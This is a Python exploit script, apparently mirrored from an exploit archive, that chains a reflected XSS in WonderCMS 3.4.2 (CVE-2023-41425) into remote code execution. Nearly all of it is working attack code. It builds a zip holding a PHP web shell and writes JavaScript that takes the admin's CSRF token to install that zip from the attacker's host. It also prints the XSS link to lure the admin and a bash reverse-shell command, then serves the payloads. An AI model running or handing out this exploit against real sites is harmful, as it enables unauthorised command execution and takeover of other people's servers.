## https://sploitus.com/exploit?id=PACKETSTORM:190575
# Exploit Title: WonderCMS v3.4.2 XSS to RCE
    # Date: 2025-04-16
    # Exploit Author: Milad Karimi (Ex3ptionaL)
    # Contact: miladgrayhat@gmail.com
    # Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
    # MiRROR-H: https://mirror-h.org/search/hacker/49626/
    # CVE: CVE-2023-41425
    
    import argparse
    import os
    import subprocess
    import sys
    import zipfile
    from argparse import RawTextHelpFormatter
    from urllib.parse import urlsplit

    import requests
    from termcolor import colored
    
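    def main() -> None:
        """Build the WonderCMS XSS-to-RCE artifacts and serve them over HTTP.

        Steps, in order:
          1. Parse ``--url`` (the target's login URL) and ``--xip``/``--xport``
             (the address this host will serve the payloads from).
          2. Write ``malicious.zip`` (a "theme" archive holding a one-line PHP
             web shell) and ``malicious.js`` (reads the admin's CSRF token from
             the page and triggers ``installModule`` to fetch that zip) into the
             current directory.
          3. Print the reflected-XSS link to hand to the admin and the URL the
             web shell is expected at once the module has been installed.
          4. Block on ``python -m http.server`` bound to ``--xip:--xport`` so the
             victim's browser can fetch the ``.js`` and the CMS can fetch the ``.zip``.

        Raises:
            SystemExit: via ``parser.error`` when ``--url`` is not an absolute URL.

        The dropped web shell is unauthenticated (``system($_GET["cmd"])``): anyone
        who can reach ``/themes/malicious/malicious.php`` can run commands on the
        target. Remove it when the engagement is over.
        """
        parser = argparse.ArgumentParser(
            description="Exploit Wonder CMS v3.4.2 XSS to RCE",
            formatter_class=RawTextHelpFormatter,
        )
        parser.add_argument("--url", required=True,
                            help="Target URL of loginURL (Example: http://sea.htb/loginURL)")
        parser.add_argument("--xip", required=True,
                            help="IP for HTTP web server that hosts the malicious .js file")
        parser.add_argument("--xport", required=True,
                            help="Port for HTTP web server that hosts the malicious .js file")
        args = parser.parse_args()

        target_login_url = args.url
        # Derive scheme://host[:port] with urlsplit instead of split('/')[0]/[2],
        # which raised IndexError on a bare hostname and accepted garbage silently.
        parts = urlsplit(target_login_url)
        if not parts.scheme or not parts.netloc:
            parser.error("--url must be an absolute URL such as http://sea.htb/loginURL")
        target_url = f"{parts.scheme}://{parts.netloc}"
        # The XSS link is built by substituting the literal "loginURL"; a renamed
        # login path would leave the payload untouched, so warn instead of
        # quietly printing a dud link.
        if "loginURL" not in target_login_url:
            print(colored("[!] --url does not contain 'loginURL'; the XSS payload will not be rewritten", 'yellow'))

        # Web shell: write the PHP straight into the archive. The previous version
        # created a scratch directory first and, if that directory already
        # existed, printed a warning and never created the zip at all.
        print("[+] Creating PHP Web Shell")
        with zipfile.ZipFile('./malicious.zip', 'w') as z:
            z.writestr('malicious/malicious.php', '<?php system($_GET["cmd"]); ?>')

        # Malicious .js: runs in the admin's browser, lifts the CSRF token from
        # the page and asks WonderCMS to install our zip as a theme. The request
        # is sent withCredentials so the admin's session cookie rides along.
        js = f'''var token = document.querySelectorAll('[name="token"]')[0].value;
var module_url = "{target_url}/?installModule=http://{args.xip}:{args.xport}/malicious.zip&directoryName=pwned&type=themes&token=" + token;
var xhr = new XMLHttpRequest();
xhr.withCredentials = true;
xhr.open("GET", module_url);
xhr.send();'''

        print("[+] Writing malicious.js")
        with open('malicious.js', 'w') as f:
            f.write(js)

        # Reflected XSS on the login page: close the attribute and form, inject
        # our script tag, then reopen a form so the rest of the page still
        # parses. The '+' characters are URL-encoded spaces.
        xss_payload = (
            args.url.replace("loginURL", "index.php?page=loginURL?")
            + "\"></form><script+src=\"http://" + args.xip + ":" + args.xport
            + "/malicious.js\"></script><form+action=\""
        )
        print("[+] XSS Payload:")
        print(colored(f"{xss_payload}", 'red'))

        print("[+] Web Shell can be accessed once .zip file has been requested:")
        print(colored(f"{target_url}/themes/malicious/malicious.php?cmd=<COMMAND>", 'red'))
        print("[+] To get a reverse shell connection run the following:")
        print(colored(f"curl -s '{target_url}/themes/malicious/malicious.php' --get --data-urlencode \"cmd=bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'\" ", 'yellow'))

        # Serve the payloads. NOTE: http.server exposes the *entire* current
        # directory, not just the two files written above; run this from a
        # scratch directory. sys.executable rather than a bare "python3" keeps
        # the server on the same interpreter as this script (no PATH lookup).
        print("[+] Starting HTTP server")
        try:
            subprocess.run([sys.executable, "-m", "http.server", "-b", args.xip, args.xport])
        except KeyboardInterrupt:
            # Ctrl+C reaches the child too; just exit cleanly instead of a traceback.
            print("[+] HTTP server stopped")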
    
    # Script entry point: nothing runs on import, only when executed directly.
    if __name__ == "__main__":
        main()